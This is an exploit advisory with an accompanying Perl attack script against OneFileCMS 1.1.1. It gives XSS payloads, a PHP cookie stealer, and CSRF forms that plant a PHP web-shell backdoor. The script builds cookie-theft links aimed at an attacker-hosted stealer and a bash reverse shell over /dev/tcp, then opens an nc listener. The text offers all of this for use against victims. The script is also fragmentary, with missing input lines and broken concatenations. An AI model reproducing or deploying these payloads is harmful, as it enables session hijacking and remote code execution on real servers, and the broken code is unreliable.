# Exploit Title: OneFileCMS v.1.1.1 Multiple Remote Vulnerabilities
# Google Dork: --
# Date: 21/8/2011
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/ - http://s3cure.gr
# Software Link: http://onefilecms.com/download/onefilecms_site_v1.1.1.zip
# Version: OneFileCMS v.1.1.1
# Tested on: Linux Fedora 14
OneFileCMS is just that. It's a flat, light, one file CMS (Content Management System) entirely contained in an easy-to-implement, highly customizable, database-less PHP script. Coupling a utilitarian code editor with all the basic necessities of an FTP application, OneFileCMS can maintain a whole website completely in-browser without any external programs.
[!] All vulnerabilities requires authentication. [!]
0x01. Cross Site Scripting vulnerability
http://VICTIM_SERVER/onefilecms/onefilecms.php?p='"><marquee><h1>XSS Vulnerability<script>alert(String.fromCharCode(88,83,83))</script></h1></marquee>
http://VICTIM_SERVER/onefilecms/onefilecms.php?p='"><script>document.body.innerHTML="<style>body{visibility:hidden; background:black;}</style><div style=visibility:visible;><center><h1><font color='white'>Please fix your </font><font color='red'> XSS </font><font color='white'>!</font></h1><br>";</script>
[!] Redirection to Google through the cross site scripting vulnerability [!]
http://VICTIM_SERVER/onefilecms/onefilecms.php?p='"><body onload="document.phising.submit();"><form name="phising" action="http://google.com"></form></body></html>
...BUT, don't forget to encode it!!!
0x02 Cross Site Request Foregery (CSRF) vulnerability
[!] Steal the cookie (sessionid) [!]
--- stealer.php ---
header ('Location:http://VICTIM_SERVER/onefilecms/onefilecms.php?f=index.php');
$cookie = $_GET['cookie'];
$log = fopen("gotit.txt", "a");
fwrite($log, $cookie ."\n");
--- end ---
Send this link to your victim...
...BUT, don't forget to encode it first!!!
Now, check the "gotit.txt" file for the cookie.
Replace the value of the "sessionid" with the cookie that you already grab...
[!] Create the evil file "csrf.php" [!]
http://VICTIM_SERVER/onefilecms/onefilecms.php?p='"><html><body onload='document.f.submit()'>
<form method=post name=f action="http://localhost/onefilecms/onefilecms.php">
<input type="hidden" name="sessionid" value="HERE_PASTE_THE_VALUE">
<input type="hidden" name="filename" value="csrf.php">
<input name="content" value="<pre><?php system($_GET['cmd']);exit;?>">
<input type="submit" name="Save">
....enjoy the backdoor :)
[!] Delete the evil file "csrf.php" [!]
http://VICTIM_SERVER/onefilecms/onefilecms.php?p='"><html><body onload='document.f.submit()'>
<form method=post name=f action="http://localhost/onefilecms/onefilecms.php">
<input type="hidden" name="sessionid" value="HERE_PASTE_THE_VALUE">
<input type="hidden" name="delete_filename" value="csrf.php">
<input type="submit" name="Yes">
# Exploit Title: OneFileCMS v.1.1.1 Remote Code Execution Exploit
# Date: 22/8/2011
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/ - http://s3cure.gr
# Software Link: http://onefilecms.com/download/onefilecms_site_v1.1.1.zip
# Version: OneFileCMS v.1.1.1
# Tested on: Linux Fedora 14
use LWP::UserAgent;
print "\n |==[ mr.pr0n ]=============================================== |\n";
print " | OneFileCMS 1.1.1 - [R]emote [C]ode [E]xecution [E]xploit|\n";
print " |===================[ http://ghostinthelab.wordpress.com/ ]== |\n";
print "\nEnter the target (e.g.: http://victim.com)";
print "\n> ";
$target = "http://".$target if ($target !~ /^http:/);
print "Enter the OneFileCMS directory (e.g.: onefilecms)";
print "\n> ";
$target = $target."/".$dir;
print "\n[+] Main Menu:\n";
print "1. Steal the \"sessionid\" cookie.\n";
print "2. Get a shell on your target.\n";
print "3. Exit.\n" ;
print "> ";
if ($option!=1 && $option!=2 && $option!=3)
print "Oups, wrong option.\nPlease, try again.\n";
goto menu;
if ($option==1)
if ($option==2)
if ($option==3)
sub cookie
print "Enter the address of the \"stealer.php\" (e.g.: http://attacker.com/stealer.php)";
print "\n> ";
# -------------------------------------------------------------------------------------
# stealer.php - source code
# -------------------------------------------------------------------------------------
# <?php
# header ('Location:http://VICTIM_SERVER/onefilecms/onefilecms.php?f=index.php');
# $cookie = $_GET['cookie'];
# $log = fopen("gotit.txt", "a");
# fwrite($log, $cookie ."\n");
# fclose($log);
# ?>
# --------------------------------------------------------------------------------------
$result = "'\"><script>document.location=\"$stealer?cookie=\"+document.cookie\;</script>";
$result =~ s/(.)/sprintf("%x%",ord($1))/eg;
print "\n[+] Send this link to your victim ...\n\n";
print $target."/onefilecms.php?p=".$result."\n";
goto menu;
sub shell
print "Enter the sessionid:";
print "\n> ";
print "Enter the IP address for the reverse connection (e.g.:";
print "\n> ";
print "Enter the port to connect back on (e.g.: 4444)";
print "\n> ";
$payload =
"<?php ".
"system('/bin/bash -i > /dev/tcp/$ip/$port 0\<&1 2\>&1');".
$filename = "index_".int(rand()*1011).".php";
$csrf =
"'\"><html><body onload='document.f.submit()'>".
"<form method=post name=f action=\"$target/onefilecms.php\">".
"<input type=\"hidden\" name=\"sessionid\" value=\"$sessionid\">".
"<input type=\"hidden\" name=\"filename\" value=\"$filename\">".
"<input name=\"content\" value=\"$payload\">".
"<input type=\"submit\" name=\"Save\">".
$csrf =~ s/(.)/sprintf("%x%",ord($1))/eg;
print "\n[+] Send this link to your victim...\n\n";
print $target."/onefilecms.php?p=".$csrf."\n";
$nc= "nc -lvp $port";
system("xterm -e $nc &");
print "\n[+] Please be patient...\n";
while (1)
$int = LWP::UserAgent->new() or die;
if ($check->content =~ m/was not found/g)
goto menu;
sub quit